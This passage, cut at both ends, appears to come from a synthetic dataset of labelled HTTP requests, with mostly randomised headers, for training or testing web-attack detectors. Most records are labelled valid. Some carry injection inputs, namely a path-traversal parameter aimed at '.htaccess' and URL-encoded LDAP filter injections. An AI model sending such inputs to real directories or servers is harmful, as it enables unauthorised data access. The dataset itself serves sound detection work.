Range: 8237-7,80-5013
Referer: /uemn/nheslE/maeiAr5.doc
TE: gzip,chunked,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/8.6 (Machintosh; U; PPC 8.2; dd-he; rv:3.2.4) Gecko/10454344
UA-CPU: PowerPC
UA-Disp: 1912,4963,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 327x1132
Via: tte/1.3 18.61.91.177:606
Transfer-Encoding: deflate
Upgrade: bccaR/0.3, ssaas/5.7, est/1.9, eToih/4.1, Gut/5.5
Warning: 184 www.hsYw.gif:851 "aIim8iDdcu9elerauinn" "Sun, 05 Apr 09 08:26:23 UTC"
X-Forwarded-For: 214.6.127.164
X-Serial-Number: 440667
----: -----------------------
~~~~~: ~~~~~~~~~~~~

lueiea=ecl41Li5OT&5etAttkh=54&7Rrloo=bsputriad9&epatzHegdt=yrd&ZXzk.bSKX=hEensb4&ohptb4=e&&1caika=5298842&ea1Nresedtin=nmsa9DyRrpt

End - Id: 5670
Start - Id: 10159
class: Valid
GET /s.CrWi65lLW/syotn2ojpS.css? HTTP/1.1
Host: 84.192.125.48
Connection: ddhOPble
Accept: text/xml;q=0.4, audio/*
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.0, gzip
Accept-Language: ot-m8oo9ie;q=0.0, n-szylf;q=0.5, stHcds-7r4b;q=0.9
Cache-Control: no-transform
Client-ip: 0.214.61.63
Cookie: PToHKAZ7OyND=097003
Cookie2: $Version="3"
Date: Sun, 22 Jul 07 10:19:52 GMT
ETag: "UnbrD7SaHsbRQN8"
Expect: OElh4ec
From: nsolnybs@2aGh.org
If-Modified-Since: Thu, 04 Jun 09 20:06:11 UTC
If-Unmodified-Since: Fri, 01 Jun 07 06:18:13 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 25 Jan 06 02:10:39 UTC
Max-Forwards: 4373
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: irimMo rnefpib=0rSnos
Authorization: NTLM bXFlOWQ5bzJneW55UDlvbHRyaXFzZWh0RDBoZGx3ZXNhdG5jMUF1dWp3emR0
Range: 71-243
Referer: /otte/jsdel/tHmjoiL.rar
TE: chunked;q=0.4,chunked;q=0.2,trailers
Trailer: TE
User-Agent: atpapOisn9 (i-xuaVZDzd)
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 103x309
Via: 4.5 193.55.6.63
Transfer-Encoding: gzip
Upgrade: toiw/9.5, atmso/8.6, 3vnwf/5.8
Warning: 742 220.153.201.240 "EfoNtetSeersejlib2b" 
X-Forwarded-For: 73.178.177.84
X-Serial-Number: 87261
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10159
Start - Id: 46109
class: PathTransversal
POST /fqVrZEQQ@iltR4/dns9GsenhHe.jsp? HTTP/1.0
Content-Length: 329
Content-Language: a2amjd0
Content-Encoding: gzip
Content-Location: /9nwy/kothore/vktaed.wav
Content-MD5: bmRvZXI3b2VkcWFlZVRldA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 26 May 06 22:47:49 UTC
Last-Modified: Tue, 06 May 08 15:40:14 UTC
Host: www.ee3aIn.com:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek, x-mac-ce;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 78.173.68.149
Cookie: teefSzzicHdhg=rByipAvyBS_J
Cookie2: $Version="6"
Date: Mon, 08 Feb 10 22:19:00 UTC
ETag: W/"tezP7LWPcMvfNfn.@"
Expect: 100-continue
From: sneTb@ntoa.org
If-Modified-Since: Sat, 13 Dec 08 17:53:18 GMT
If-Unmodified-Since: Sun, 04 Jan 09 18:18:42 CET
If-Match: "7daUXr4sMREv4k@w11R"
If-None-Match: "eaDJv2vn9mMXRHLOE"
If-Range: Fri, 12 Aug 05 10:34:02 GMT
Max-Forwards: 428
MIME-Version: 0.9
Pragma: w='S'
Proxy-Authorization: NTLM N3lkaXZoNXRmcmFuaG9sYWRuYWlkbm90YW9lZHBqZUlob0F5ZU5h
Authorization: Basic aDVlYWVyOnM0YW5kYWVh
Range: -03018,-4474
Referer: /ttheloi/oIbihef/ugrtntH.rar
TE: chunked;q=0.0,chunked,trailers
Trailer: If-Match
User-Agent: ltMmtcserd9to8lwiq
UA-CPU: StrongARM
UA-Disp: 013,8329,8
UA-Color: color16
UA-Pixels: 1090x096
Via: FTP/7.7 www.ezo6eiCe.css, 5.4 www.eeotiee0.jpg, FTP/3.3 87.79.168.17:4
Transfer-Encoding: Ncr4yk
Upgrade: cRpj/3.7
Warning: 825 www.rthoh4.html:3 "sTlt2eutin4eMhjcw" "Sun, 01 Feb 04 07:08:46 UTC"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

anrf0becehadshA=012&4t0mSmu=h:/.htaccess~&iianzteeae=sqnoedo vear&ZoJxA5N6F=935202591&ardehIaidreh=657&rdeeG=6845650&neeP0se=odeiadvolAIyt&wrei=753286&aYdeCsn= cdropm90Otcopychildsonlnkiecho&eAiweot=anm1lmRuh$tij2e&oeeniyeteopk=lyikiIwtyrtseti&eeIg1t=whglocationis1nzooelibi&9ierifElihlAo=aN:noer&jfhvonei5wudkig=7paw3o

End - Id: 46109
Start - Id: 7526
class: Valid
POST /axYe/hv.5UR6qofV5lAqn/59seaewsa/2PLlsxterm6UI3window.open/e2K-M6IBjLuun1XWGF/eHgOTTzxs7X@CVhA/fsh/ldetuuaffwIet.png? HTTP/1.0
Content-Length: 137
Content-Language: s3,de8t,mrtees3
Content-Encoding: deflate
Content-Location: /ytinecnb/Lit0we/ecry/oye8s.asmx
Content-MD5: bm9aeTVqZmF0WWZpNm9vcw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 09 Feb 06 01:27:47 GMT
Last-Modified: Sun, 20 Feb 05 01:39:14 UTC
Host: www.lnnerzergs.fr
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rUwfsna-asyae;q=0.0, t-maShi8i;q=0.2, ax-7t, seerT-eu2r, pntwmm-kb3dt;q=0.9
Cache-Control: max-age=7
Client-ip: 85.2.252.67
Cookie: itpI5uienfops=28154871;s8wbie3i=13950584;8xCiWn2ncKj=047;.bVgH=jlSy9A
Cookie2: $Version="208"
Date: Thu, 08 May 08 21:34:25 UTC
ETag: W/"p@CwFrx9McJDV3bl"
Expect: 100-continue
From: eiansue@4pzkiAn.ch
If-Modified-Since: Mon, 05 Apr 10 06:02:42 GMT
If-Unmodified-Since: Wed, 27 May 09 07:33:02 UTC
If-Match: "Evqh@O_bEGy2TS3o5"
If-None-Match: "z69zKaNkZLZYFGrT"
If-Range: Fri, 10 Dec 04 19:38:18 GMT
Max-Forwards: 89
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM N3RhYWxzYUFvRXVlYW9Zc0FveWVlMGVmYXJnbWRlZHRzeXhybnV0cw==
Authorization: Digest response="9CeC54Fc430B88ebd12B3fDd319A6EBa"
Range: -92,6032-3118
Referer: http://aetpirEt.ch/omybSole.aspx
TE: trailers,chunked;q=0.8
Trailer: From
User-Agent: Mozilla/6.4 (X11; U; Linux i586 8.2; ue-ir; rv:6.2.1) Gecko/90450600
UA-CPU: x86
UA-Disp: 8435,1661,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 568x0909
Via: 3.5 www.njntg.shtml, FTP/4.7 161.150.68.151, 4.9 www.dUesrfos.html
Transfer-Encoding: gzip
Upgrade: re0dg/7.1
Warning: 753 44.227.245.134:8 "ufs6htn0rl" 
X-Forwarded-For: 191.61.229.46
X-Serial-Number: 458445929506444
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rywd5=i3tlwl&tf=evn6ak&mr5rnltsqtiANs=asOp&heaoehhoa='pt&aotgcTewBs8vsne=0733&ifnaxkEkn=rve&JKevalJfadminLservicesErAC=50019393&lop=hie

End - Id: 7526
Start - Id: 16678
class: Valid
GET /3usaoasmreqnes/B3tEJ.js? HTTP/1.1
Host: www.tReesoiw.st
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, identity, gzip, deflate;q=0.3
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 205.215.21.148
Cookie: servicesdfvbscripts1Lf=82;S7BFZPT=1
Cookie2: $Version="317"
Date: Thu, 14 Jun 07 23:54:49 GMT
ETag: W/"CR9YJEZcRkY8H3XaQ1"
Expect: 100-continue
From: noedlreb@rlhth.be
If-Modified-Since: Fri, 01 Jan 10 11:46:34 CET
If-Unmodified-Since: Tue, 04 Jan 05 02:51:30 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 19 May 06 13:16:07 GMT
Max-Forwards: 6553
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic ZXVUV3A6c29iYXJyZU8=
Authorization: uri1dE s0On=i9raA
Range: 251-5
Referer: http://www.naFePruo.be/iEn4/iDoteE/nzlhsli/eEieolag/h3anvewi.cfm
TE: deflate,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/1.1 (Machintosh; U; PPC Mac OS X 4.4; Om-wo; rv:7.4.3) Gecko/81871810
UA-CPU: x86
UA-Disp: 0786,0517,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 6609x7402
Via: 4.3 www.fueteo.htm
Transfer-Encoding: compress
Upgrade: bt5iw/9.8, eelOhb/1.7, sstab/7.9, e3e/5.2, ifooo/5.5
Warning: 890 www.nUiou.jpeg "oe52aLer" 
X-Forwarded-For: 241.107.33.0
X-Serial-Number: 53826170590779216
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16678
Start - Id: 37187
class: LdapInjection
GET /tAi6wGGJgyD8rJ721.mspx?diCaheeeittf=ahle0H7emouw6s&4daje4Es9eUtbl=childwherecndsreplacemrnEc%5Colikef&qf7it6tE=%29+%28++%7C+%28displayName%3Dhad*%29++++%28name++++%3D+had*++%29%28+mail%3Dhad*++++%29&nhiul=htnem&xnuQz=ihi1hasoneeat&ry2otbaaly5oenr=nrecnzhqHiya5r&6dfieeaeswr=ephaving&1s3eotl=020700&isfrxmoeErIo=34774051&wv6=17 HTTP/1.0
Host: 10.232.209.156
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 70.71.99.38
Cookie: aswREeeGflOe=4etcri u :D$u:ter ercp;ot5zomusl=8etr;eeurroex=K8=;depddor9ccoCnaa= Hnl
Cookie2: $Version="2"
Date: Wed, 29 Nov 06 02:04:36 CET
ETag: "gWkihjapRYwi3oCzZ"
Expect: sgdaie
If-Modified-Since: Mon, 19 Oct 09 17:17:15 GMT
If-Unmodified-Since: Mon, 11 Aug 08 09:44:33 GMT
If-Match: *
If-None-Match: "ts9IO4T94KkfxVGe2xNl"
If-Range: Wed, 14 Sep 05 03:31:26 UTC
Max-Forwards: 0
MIME-Version: 6.5
Pragma: hpn=agoiname
Authorization: iai0nd 4nyszpea=dnbr
Range: 3385-,6968-,40-033
Referer: /intaf/aygom/jrsda.php3
TE: trailers,chunked,chunked
User-Agent: hpjesrua/8.9.8.1.5
Via: FTP/9.7 www.levx8zb.tiff:83
Transfer-Encoding: identity
Warning: 049 www.snrd.js "elEedMobfonU" 
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37187
Start - Id: 37005
class: LdapInjection
GET /ee5IqDMVoLCg0IW/sGJuR3UdGRa1YRSa/ehrateiatc9/lrtdnEEXIq2iwrqdbnsg/Dc6_AkI5bXBnT/bUOn6-vpTTCo-cIOkLe5/4S@Ykn_/iPV/dv@rzC1PaM/hx7phas/oshthhtadAhNwdnol/yN@.jsp?tii=5&s6YE8systemm-F=4227&ACeasi4=%29++%28+++%7C++%28++cn%3D*o++%27brien*++%29%28mail+++%3D*o%27brien*+%29+&btt=sItwa4p6&eehwi=2&xaaee=2&aegzo6r=emi&wh=rry HTTP/1.1
Host: www.zt3cin.de:80
Connection: keep-alive
Accept: application/*;q=0.7, image/gif
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: e-aooEpa, h-qhhtrH
Cache-Control: min-fresh=6
Client-ip: 134.238.253.203
Cookie: slztwh=lsenty>;wgetLo1oVgSO=koae6;dOheE=876
Cookie2: $Version="554"
Date: Wed, 28 Jul 04 18:13:30 UTC
ETag: "20ntY0j0_uHW@71DvrO"
Expect: 100-continue
From: 4taAnee@sfR4.cz
If-Modified-Since: Sat, 14 Apr 07 21:25:48 GMT
If-Unmodified-Since: Wed, 30 Aug 06 07:16:24 CET
If-Match: "5I2q__NQ0HL9Jc02bc5A"
If-None-Match: "ToxdwizwbQJF.UzWqV"
If-Range: Thu, 04 Nov 04 14:20:29 GMT
Max-Forwards: 336
MIME-Version: 6.2
Pragma: 0six=i
Proxy-Authorization: NTLM bjhjeWN6aXRhb2VyY2VzcnBvOXloU2Y1dnJsdGhsNnRyOG5pb2N4TE4=
Authorization: NTLM cGxyT25vaHU2OWFtc2ppaThodDdqWW1oekNjbHdlUmFlc2JlYWZlU2V0WWV0
Range: 11-,-9658
Referer: /cgwaeemJ/R1ot9a.php
TE: gzip;q=0.0
Trailer: If-Match
User-Agent: 6nrdrs (nbiu1h; c1kgSJ981; oQBaPMj; od2iomAF)
UA-CPU: PowerPC
UA-Disp: 720,086,32
UA-Color: color32
UA-Pixels: 8274x205
Via: loi/9.3 135.61.31.29, 3.4 www.cSreauo3.png, 8.1 www.eehoDnoi.tiff
Transfer-Encoding: compress
Upgrade: roet/7.5, Xeuonr/9.7, oeer/4.8, opcsoe/4.8
Warning: 992 www.dyteeg.tiff "riPlyr" 
X-Forwarded-For: 106.206.209.192
X-Serial-Number: 4092233930
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 37005
Start - Id: 18124
class: Valid
GET /Xq27M5G/s_5NJO2w8P0yqFfKc@1/s1m_.php4? HTTP/1.0
Host: www.bnUnou.com
Connection: tgestss
Accept: audio/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.5, gzip;q=0.4, deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 192.8.141.6
Cookie: scedweplapce=64535;KB5X=adfos
Cookie2: $Version="10"
Date: Mon, 18 Aug 08 01:50:00 UTC
ETag: W/"rhcS_4hO9_XEsNz8dd"
Expect: 100-continue
From: hwDyshr1@ecneonN.be
If-Modified-Since: Thu, 18 May 06 14:55:22 CET
If-Unmodified-Since: Sun, 13 Feb 05 05:48:21 UTC
If-Match: "jbWcuoISLPsi@QWe5"
If-None-Match: "@jwVg2ewsK5bdA-4P"
If-Range: Tue, 19 May 09 10:51:52 GMT
Max-Forwards: 4
MIME-Version: 4.1
Pragma: iisi=d
Proxy-Authorization: NTLM MW9zZVRwc2lvdnJtY2NkSWFxeWVlMmxybmN0eWlvaWFhcGl6ZmU5aVNybTdqbzA=
Authorization: Digest response="Ad8E23477426A4d43BCEB1CbCdbD870f"
Range: 24-,21839-647
Referer: /uGpn/ueas4nts/rbhr/ssrn8e.sh
TE: trailers
Trailer: Range
User-Agent: k7ereeRnyimocgrasuht
UA-CPU: Sparc
UA-Disp: 2247,5505,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4077x543
Via: FTP/6.4 137.29.226.58:4, FTP/8.2 81.217.153.7
Transfer-Encoding: identity
Upgrade: 8rhetT/2.2, 0fno/6.2, Swi/2.0, ehe/1.3, iaeicr/1.5
Warning: 432 www.uatfoT.gif "ojer8gtnteao0ut" "Wed, 24 Mar 10 12:45:46 GMT"
X-Forwarded-For: 7.193.95.179
X-Serial-Number: 0610755676490078
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18124
Start - Id: 21802
class: Valid
GET /sNDqmg135a0z/3Hx.jsp?o1tsos=u7Ou&erhhslaa=p8Hgk.JXF HTTP/1.0
Host: 251.238.6.50
Connection: ownma
Accept: text/*, application/rtf
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: max-age=5
Client-ip: 219.163.45.202
Cookie: Itb=t3&ahwem F bo6a;7ct=9881092
Cookie2: $Version="4"
Date: Thu, 20 Sep 07 07:25:26 GMT
ETag: W/"h2ZOQ8GkeMdfl7Omwh"
Expect: 100-continue
From: qn7fi@stAorh.org
If-Modified-Since: Wed, 02 May 07 12:35:23 GMT
If-Unmodified-Since: Thu, 25 Jun 09 06:53:42 GMT
If-Match: "2NE5GSkgmsdoM3N"
If-None-Match: *
If-Range: "4e.K3zz3sE@_Lw@"
Max-Forwards: 452
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: NTLM YlRhZ285aHJjc3VhbWJOdHN0b2hnaTl0MGJsY25ycHlkbmlBYnNzdA==
Authorization: Basic ZHR2bGkyT2Q6ZW1tZWE1dA==
Range: 34667-,064-69,-268
Referer: http://www.a01s.de/i1eotzd.pdf
TE: chunked
Trailer: Max-Forwards
User-Agent: Mozilla/2.5 (compatible; Konqueror/9.8; WinNT; eweam7ls; iimaprt; ahlroand)
UA-CPU: StrongARM
UA-Disp: 488,0035,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5280x218
Via: 0.8 11.126.27.101
Transfer-Encoding: gzip
Upgrade: lmt3e/5.6, eogjeo/0.1
Warning: 281 www.mehu.png:9321 "ryoermnI0lwry" "Sun, 27 Nov 05 22:05:35 CET"
X-Forwarded-For: 221.81.223.145
X-Serial-Number: 8436166703567420278
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21802
Start - Id: 33394
class: Valid
POST /4tr.shtml? HTTP/1.0
Content-Length: 66
Content-Language: f6Meloe
Content-Encoding: deflate
Content-Location: /esvnylLe/tisltI/rn1o4t/eanhu/ye2pVb.jpeg
Content-MD5: ZWVlYW9zRDBsVGlvYW5zeg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 07 May 05 13:13:52 CET
Last-Modified: Thu, 24 Feb 05 02:13:05 UTC
Host: www.oad7Ntg.org
Connection: laa3E9en
Accept: */*
Accept-Charset: euc-kr;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 87.155.255.84
Cookie: ovmocztsmf=ia;iAermtcurFar8i=Epqetm
Cookie2: $Version="3"
Date: Fri, 08 Aug 08 06:01:43 CET
ETag: "CzaKvF.TDjiudbhF7T"
Expect: ea87te
From: ooydtlh@tuohEicue.de
If-Modified-Since: Wed, 04 May 05 04:57:59 CET
If-Unmodified-Since: Sat, 12 Apr 08 17:03:57 UTC
If-Match: "ynDFOhKCXQwmA4fpbz"
If-None-Match: "bkxmu6az1RGc61TrOBd"
If-Range: *
Max-Forwards: 7519
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest realm
Range: 7289-656,71-060150
Referer: http://www.e2rtoe.fr/axhE/eehdzlp/slraahas/Trya9eob/pieOuYEi.dll
TE: trailers
Trailer: Range
User-Agent: 10einr
UA-CPU: x86
UA-Disp: 326,087,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 811x2728
Via: HTTP/2.6 200.104.35.72, 7.0 www.EterahuF.js, 5.3 www.syhda.tiff:151
Transfer-Encoding: compress
Upgrade: wcd8/1.3, hwe/0.4, aash/9.8, EsA/2.8
Warning: 454 98.218.12.151:008 "6Oim04" "Sat, 06 Nov 04 21:21:33 UTC"
X-Forwarded-For: 229.236.129.140
X-Serial-Number: 93235551323019151899
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9ZXn9p3Nu-=7360819589&a8mfbi2o=cCIchild&nb=487449&eilAl6=751239978

End - Id: 33394
Start - Id: 1434
class: Valid
GET /netIhmeroahJtamcNaeo/ex9EPoXj9z0FY4h9U/Hvii1atoti.css?tlistyius=kdopzrhomeoxstotHd8kj%3A&lrW_3=85&deletem641Ac.p0=356310&EBnlsHzJ_GJbody=592769&nRRNosrvne=tnga1&h48p6b=393&tes3mnedhlz=9&tAants=h%2Bee&ymae3yt=oxmlw5teppsOetcreEr&sscemmind1tmb=74015640 HTTP/1.0
Host: www.Ii9mlmh.net
Connection: Etcreh
Accept: video/*;q=0.6, image/jpeg, video/quicktime
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.7, identity
Accept-Language: Lh5ekeh-o0rfe, raT-rl, o-narg;q=0.1, oBemR-ieept, adapstt-riye6p;q=0.5
Cache-Control: no-store
Client-ip: 192.3.182.99
Cookie: OtUgte7t=7438;haarb=7790831
Cookie2: $Version="308"
Date: Tue, 20 Nov 07 18:23:07 CET
ETag: W/"IYHuF86w20rsGouP"
Expect: nddcy=osSaPP
From: oOaeifaU@dedahe.st
If-Modified-Since: Tue, 12 Jul 05 16:04:21 GMT
If-Unmodified-Since: Thu, 26 Oct 06 17:01:40 CET
If-Match: "YUvGps7RW@LyIbtc.kZJ"
If-None-Match: "4BLnBKK0Qz-5.T5"
If-Range: Tue, 28 Feb 06 13:19:52 CET
Max-Forwards: 642
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic aXNlZWFGOmFnc3M=
Authorization: NTLM bnN5YWRtbWpyd282SHBlaXhlcmhhYXRtY2hnMFRjdHZk
Range: 6-15763,0058-47
Referer: /m0tm/rtilw4es/tmel.png
TE: deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/9.4 (Windows; U; Win98 2.7; T5-Ih; rv:3.2.4) Gecko/69953961
UA-CPU: x86
UA-Disp: 592,845,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 226x4570
Via: FTP/6.7 www.hmiI1s.jpg:7793
Transfer-Encoding: identity
Upgrade: nhr/4.5, ondn/4.1
Warning: 674 176.177.145.209 "w8sNts" 
X-Forwarded-For: 112.212.64.188
X-Serial-Number: 1347008
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1434
Start - Id: 26676
class: Valid
GET /1J01m8mXsGAlFmFOw9/yIp2YizOc4J-lC/etOgaii4n4c/mGdRVUedhk/eeTe6w8nheedoteecNmc.html?laesisslsg=elinkalnr&mqhMotitrsp=ovi&treo9leeet7tae=adrh&te4rrnsAeet0nEa=tfrbeg&fGUtaJtyo=817505&ts0i2mahldiao=62672&QNimgmMMhtaccesPo=r%5Dry%3Ez2&leIirha1nXtixy=3eahor1rm%29Msr8 HTTP/1.1
Host: 57.63.111.133:46
Connection: keep-alive
Accept: text/html
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.3
Accept-Language: in-gnaufc1;q=0.4, aesr4h-to, mtiab-rad, eai-ATnn;q=0.1, Ca-nrDueo;q=0.9
Cache-Control: no-store
Client-ip: 197.217.166.9
Cookie: harmf2hsaofNf=ap6fWd7oD;mtqsu76gEane=scripttM$;Tt=i35CD_;eE9bgusoR=sas(d
Cookie2: $Version="3"
Date: Fri, 04 Sep 09 24:23:27 CET
ETag: "OXEwyJ.-XWo@BVK"
Expect: l9B7meo=9eethcj
From: aenrotes@hoereselr.be
If-Modified-Since: Mon, 27 Jul 09 01:19:49 GMT
If-Unmodified-Since: Tue, 10 May 05 05:34:17 UTC
If-Match: *
If-None-Match: "qPP0XaIbKfr_s4gJ3"
If-Range: Mon, 12 May 08 21:12:21 UTC
Max-Forwards: 7039
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest response="24ebD5f3BCcCec4f689DAfd20DcADAf6"
Authorization: Basic bmduN2hlOmx0c3dkcmg=
Range: -931372,028-677
Referer: http://0U0r.cz/udju/itts/eslznl/1c7czs/iegobneo.cfm
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/8.7 (Machintosh; U; PPC Mac OS X 3.5; af-ln; rv:5.4.6) Gecko/02319641
UA-CPU: PowerPC
UA-Disp: 0736,120,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 190x433
Via: 1a3/3.9 www.edaoicdl.html:269, HTTP/2.2 233.175.238.109, 2.5 www.rpsQayi.shtml
Transfer-Encoding: deflate
Upgrade: ottfS/3.5, uako/7.9, ttm/6.7, eol/3.3
Warning: 647 www.73orh.js "6zehdei0repaoct" "Sun, 20 Nov 05 12:22:26 GMT"
X-Forwarded-For: 116.189.185.38
X-Serial-Number: 7904628
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26676
Start - Id: 18958
class: Valid
GET /ei9TpikZ@-/mMa7l/aiRhmhseiolU.htm?wakssletswynrmy=vXLxCw&AqKoservicesaB6p=4y%5Det&dm9hee1s=igyZtjYJ3dyc&ltetjeut48nhne=7010484&dd2ebdg=kosrEl6%25t%29 HTTP/1.1
Host: www.r5epwbs.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, identity;q=0.3, compress;q=0.2
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 79.237.56.253
Cookie: g7asgc1Ewio=90tD2FpwWC;2aa8QT8klqmwthZ=259720;deT=1700;rEed=l5hD.s;dweha3p=c-zxSt4WbSOt;enue=057925
Cookie2: $Version="358"
Date: Thu, 23 Jul 09 04:55:28 UTC
ETag: "R.jMxP8GeCxAaao"
Expect: 100-continue
From: yhhrcnd@rmltnrr.ch
If-Modified-Since: Fri, 27 Feb 09 12:02:47 GMT
If-Unmodified-Since: Sun, 22 Apr 07 12:27:06 GMT
If-Match: "EGLJCsHgKHHth7@avH"
If-None-Match: *
If-Range: Tue, 15 Aug 06 21:58:25 GMT
Max-Forwards: 6572
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: deni BgeCdtco=owltyT
Range: 1-095
Referer: http://www.rwboLis.de/ae3o/0zSarEt1/r7eo/1emeihln.swf
TE: trailers,deflate;q=0.2,chunked;q=0.9
Trailer: Authorization
User-Agent: lnanmdr/7.5.8
UA-CPU: 68000
UA-Disp: 2836,0618,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2163x0680
Via: a9loAe/5.5 92.167.69.5, HTTP/8.4 www.9mit.png:52, HTTP/3.3 www.mtedn.png
Transfer-Encoding: gzip
Upgrade: Oeosl/8.2, rovdy/3.4, Ipu/2.0
Warning: 274 103.50.6.94 "Nnxruknc1" "Wed, 14 Dec 05 19:16:26 UTC"
X-Forwarded-For: 166.105.2.220
X-Serial-Number: 27260320301
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18958
Start - Id: 3575
class: Valid
GET /eB5mtw/ndV7ofeWVGaQb.jpg?dhir=ypuclEIusa1h&.dZp=shutdown+YTlink&rosqsIxtOdyfnlo=3665&sex=l&aga3hubr=StrL&rt2aRwsa9n9=w%40FzSH&kCLxiYMsa_OY=o8ua8dtusf&trkuet5w9ldrzdo=psoO8h0eaktutr5sed&1e=lduuwomevalc%7Cdl%5Cfeonit%7E&-c.2VUWnHY=173988476&@CHYC8_-bsD=0629&-KUvbscript@.8ZQ8iG=3dimsyeRntdnNrat&cMA2ieshiv=dKj&BcuTt9qmoSpeoe=tg HTTP/1.0
Host: 229.8.75.221
Connection: keep-alive
Accept: text/plain, audio/x-wav, image/png;q=0.3
Accept-Charset: iso-8859-4;q=0.0, big5
Accept-Encoding: *;q=0.5
Accept-Language: okswvdyn-O5
Cache-Control: no-cache
Client-ip: 190.190.63.225
Cookie: sgolc=5752;gusaetedaEphorx=2cetweaiax2c3leru
Cookie2: $Version="203"
Date: Sat, 05 Apr 08 05:33:16 CET
ETag: "QplS4BuI1IKsxazvq8TF"
Expect: ymirg=sGd2;oedel
From: a0eenp@wei1eahwB.com
If-Modified-Since: Tue, 30 Nov 04 09:17:58 UTC
If-Unmodified-Since: Fri, 05 Aug 05 23:06:36 GMT
If-Match: "aSa.EVdn68896xAZP3"
If-None-Match: "kQjJ4LmBu8Ix741x"
If-Range: "p-.Bn3afu8mP0YOMW"
Max-Forwards: 29
MIME-Version: 5.0
Pragma: 0relhepo='e7gh1'
Proxy-Authorization: Basic b291ZGFvOjRFcmgzdGU=
Authorization: wgdpe iBen=Iili
Range: 285-321592,-0,1-98
Referer: http://stlboou.cz/itjto/OUiec.mdb
TE: gzip;q=0.7,chunked;q=0.0
Trailer: Pragma
User-Agent: 7nfV5Icp5 http://www.i1Tttti.cz
UA-CPU: MIPS
UA-Disp: 481,666,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 047x6463
Via: 2.0 www.icbmh.js:0354, FTP/9.5 53.206.131.92, HTTP/8.1 www.ntbaiat.html:851
Transfer-Encoding: gzip
Upgrade: de4/4.9, rrhfau/6.1
Warning: 502 www.deutlFai.htm "sdoAadanidclexcd" "Sun, 24 Jan 10 15:55:45 CET"
X-Forwarded-For: 36.67.190.24
X-Serial-Number: 399935744
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3575
Start - Id: 7435
class: Valid
POST /IDWiX@SS_o_6jN/uNqmMM0U_eBQS/tAMOHhcfbsF.8yMiH@J.jpg? HTTP/1.1
Content-Length: 209
Content-Language: r,tx7tsRo,mD6
